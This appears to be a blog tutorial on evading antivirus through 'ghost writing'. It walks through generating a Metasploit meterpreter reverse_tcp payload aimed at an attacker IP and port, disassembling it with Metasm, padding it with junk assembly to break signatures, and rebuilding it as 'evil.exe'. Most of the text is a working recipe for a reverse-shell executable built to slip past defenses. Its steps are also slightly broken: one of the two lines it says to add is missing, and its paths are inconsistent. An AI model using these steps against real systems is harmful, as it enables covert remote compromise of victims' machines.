The Challenge of Evading the antivirus has always been a discussion between Malware developers , Antivirus vendors and many other IT Security proffessionals . The same challenge was face by my team (I was in the Red Team) during the penetration Test . We used ghost writing for antivirus evasion and were quiet successfull in Pwning the reverse shell of a fully Patched and Updated Machine (Windows 8 , Security Essentials) .
How do Antivirus Engines Detect your Malicious Code ?
There are generally 2 main techniques used by AV Engines for Malware Detection :
Hueristic Analysis (Behavioural Detection) and Static Binary Analysis .
Most AV vendors use Static Binary Analysis for detection , Hueristic has a performance overhead on Engine and rarely used . In Binary Analysis the the engine looks for small pieces of code called Signatures (such as opening a port on computer for reverse connection or maybe creating registry entries).
What is Ghost Writing ?
Ghost Writing is a way of Obfuscating the binary / assembly code in such a way that the signature no longer exists due to malware code obfuscation and no functionality of the malware is lost .
The Idea here is to add random Assembly instructions to the disassembly of the executable and maitaining the functionality of the malware at the sametime .
First create a malicious executable in raw binary format using the Metasploit Framework :
msfpayload windows/meterpreter/reverse_tcp LHOST=<your-ip> LPORT=<your-port> R> raw_binary
Now we need to Disassemble this Raw binary code using Metasm . Metasm is a ruby liberary which can be used for generating the disassembly of the raw code .
On Kali to make the Metasm liberary work just run the command :
gem install metasm
Creating the Disassembly of the Binary code :
ruby ~/usr/share/metasploit-framework/lib/metasm/samples/disassemble.rb raw_binary > asm_code.asm
Now the assembly code is ready . To manually obfuscate the code one needs deep knowledge of Assembly . Please refer to this link for Tutorial on assembly
It would be best if the Obfuscation is used in the code sections that are flaging your target AV.
Add any assembly code (Random statements can be increment or decrement of register values or moving values to register and then again back to the register.) to the file until the functionality of the file is not affected.
Just a trick that might do the job is to add random assembly code before the XOR statement that sets the value of a register to zero .
Building the Executable from the Assembly : PEENCODE.rb
Add the following two lines of code to the top of the asm file .
.section ‘.text’ rwx
Just a quick explanation of the 2 Lines : .text section is where the actual code resides . We have given the text section Read , Write and Execute permissions in the first line . Entrypoint is where the actual code execution will begin . We have expliciltly defined our entrypoint .
Now build the Executable run and get the assembly in proper windows PE format :
ruby ~/tools/metasploit/lib/metasm/samples/peencode.rb asm_code.asm -o evil.exe
If all went right the output of the command will be :
evil.exe: MS-DOS executable, MZ for MS-DOS